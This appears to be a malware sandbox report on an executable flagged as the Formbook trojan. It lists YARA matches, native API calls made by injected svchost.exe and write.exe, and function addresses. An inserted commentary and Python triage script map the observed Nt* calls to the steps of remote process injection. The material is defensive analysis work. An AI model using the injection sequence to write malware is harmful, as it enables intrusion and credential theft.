            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042C3B3 NtClose,8_2_0042C3B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772B60 NtClose,LdrInitializeThunk,8_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037735C0 NtCreateMutant,LdrInitializeThunk,8_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03774340 NtSetContextThread,8_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03774650 NtSuspendThread,8_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772BF0 NtAllocateVirtualMemory,8_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772BE0 NtQueryValueKey,8_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772BA0 NtEnumerateValueKey,8_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772B80 NtQueryInformationFile,8_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772AF0 NtWriteFile,8_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772AD0 NtReadFile,8_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772AB0 NtWaitForSingleObject,8_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772F60 NtCreateProcessEx,8_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772F30 NtCreateSection,8_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772FE0 NtCreateFile,8_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772FB0 NtResumeThread,8_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772FA0 NtQuerySection,8_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772F90 NtProtectVirtualMemory,8_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772E30 NtWriteVirtualMemory,8_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772EE0 NtQueueApcThread,8_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772EA0 NtAdjustPrivilegesToken,8_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772E80 NtReadVirtualMemory,8_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772D30 NtUnmapViewOfSection,8_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772D10 NtMapViewOfSection,8_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772D00 NtSetInformationFile,8_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772DD0 NtDelayExecution,8_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772DB0 NtEnumerateKey,8_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772C60 NtCreateKey,8_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772C00 NtQueryInformationProcess,8_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772CF0 NtOpenProcess,8_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772CC0 NtQueryVirtualMemory,8_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772CA0 NtQueryInformationToken,8_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773010 NtOpenDirectoryObject,8_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773090 NtSetValueKey,8_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037739B0 NtGetContextThread,8_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773D70 NtOpenThread,8_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773D10 NtOpenProcessToken,8_2_03773D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04784650 NtSuspendThread,LdrInitializeThunk,11_2_04784650
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04784340 NtSetContextThread,LdrInitializeThunk,11_2_04784340
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04782C70
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782C60 NtCreateKey,LdrInitializeThunk,11_2_04782C60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047835C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047839B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04782B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04783010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04783090 NtSetValueKey
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04783D70 NtOpenThread
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04783D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00558DB0 NtCreateFile
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00558F20 NtReadFile
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00559010 NtDeleteFile
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005590B0 NtClose
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00559210 NtAllocateVirtualMemory
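The native-API list above for write.exe (process 11) is the security-relevant part of this block: taken together, NtOpenProcess/NtCreateProcessEx, NtAllocateVirtualMemory/NtWriteVirtualMemory/NtMapViewOfSection, NtProtectVirtualMemory and NtGetContextThread/NtQueueApcThread/NtResumeThread are the complete tool set for writing code into another process and starting it, which is what the "Writes to foreign memory regions", "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures in the overview describe. The script below is an added triage helper, not Joe Sandbox code and not part of this report: it parses evidence lines in the exact shape shown here (function address repeated at the end, API names comma-separated), and reports, per process, which injection roles the observed Nt* calls cover. The grouping of APIs into roles is my own reading of the documented NT API semantics; the sample input is a handful of lines copied from this report.

```python
"""Triage Joe Sandbox 'Code function' evidence lines for process-injection API sets.

Added example for this report; not Joe Sandbox code and not part of the report.
Input lines keep the report's shape, including the function address repeated at
the end (a link anchor that survived extraction).  INJECTION_ROLES is my own
grouping of Microsoft's documented NT APIs, not a classification the report makes.
"""
import re
from collections import defaultdict

# Constructed input: lines copied from this report's evidence list.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04782D10",
    r"Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04782EE0",
    r"Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782FB0 NtResumeThread,LdrInitializeThunk,11_2_04782FB0",
    r"Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047839B0 NtGetContextThread,LdrInitializeThunk,11_2_047839B0",
    r"Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782E30 NtWriteVirtualMemory,11_2_04782E30",
    r"Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782F90 NtProtectVirtualMemory,11_2_04782F90",
    r"Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782F60 NtCreateProcessEx,11_2_04782F60",
    r"Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004096A00_2_004096A0",
]

# <pid>_<phase>_<addr> <api,api,...>,<pid>_<phase>_<addr>; the API list may be empty.
LINE_RE = re.compile(
    r"^Source:\s*(?P<path>.+?)Code function:\s*"
    r"(?P<pid>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s*"
    r"(?P<apis>[A-Za-z0-9_,]*?),?"
    r"(?P=pid)_(?P=phase)_(?P=addr)\s*$"
)

# Each role is one step of a classic remote-injection sequence (my grouping).
INJECTION_ROLES = {
    "reach target": {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx"},
    "place code": {"NtAllocateVirtualMemory", "NtWriteVirtualMemory",
                   "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "make executable": {"NtProtectVirtualMemory"},
    "run code": {"NtGetContextThread", "NtSetContextThread",
                 "NtQueueApcThread", "NtResumeThread"},
}


def parse_line(line):
    """Return a record for one evidence line, or None if the line has another shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    apis = [a for a in m["apis"].split(",") if a]
    return {
        "path": m["path"],
        "pid": int(m["pid"]),
        "addr": int(m["addr"], 16),
        "apis": apis,
        # The report pairs many Nt* stubs with LdrInitializeThunk; keep that visible.
        "via_ldr_thunk": "LdrInitializeThunk" in apis,
    }


def triage(lines):
    """Per (path, pid): injection roles covered by its native calls, and whether all are present."""
    roles = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        for api in rec["apis"]:
            for role, members in INJECTION_ROLES.items():
                if api in members:
                    roles[(rec["path"], rec["pid"])].add(role)
    return {
        key: {"roles": sorted(found), "complete": len(found) == len(INJECTION_ROLES)}
        for key, found in roles.items()
    }


if __name__ == "__main__":
    for key, verdict in triage(SAMPLE_LINES).items():
        print(key, verdict)
```

Run against the full evidence list of a report, the "complete" flag marks processes that hold every step of an injection chain; a process with only "place code" and "run code" still deserves a look, since a mapped section does not need NtProtectVirtualMemory to become executable.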
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004096A0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0042200C
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0041A217
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00412216
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0042435D
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004033C0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044F430
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004125E8
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044663B
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00413801
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0042096F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004129D0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004119E3
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0041C9AE
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0047EA6F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0040FA10
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044EB5F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00423C81
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00411E78
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00442E0C
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00420EC0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044CF17
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00444FD2
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0454F658
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00403090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0042E9B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00402BCE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00402BD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040FCC3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040FCBA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004165DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004165E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040FEE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040DF63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03730100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03764750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0375C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03800591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0380A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0376E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03760F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03782F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03732FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03740E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03752E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0373ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03758DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03740C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03730CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0372D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0378739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0375B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0372F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0377516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0380B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03731460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0377DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0375FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03785AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03749950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0375B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03741F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03749EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03743D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0375FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FFCF2
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047F4420
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047FE4F6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04802446
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04810591
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04750535
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0476C6E0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04750770
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04774750
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0474C7C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047E2000
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_048041A2
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047D8158
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_048101AA
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_048081CC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047EA118
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04740100
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047F0274
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047D02C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_048103E6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0475E3F0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480A352
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04750C00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04740CF2
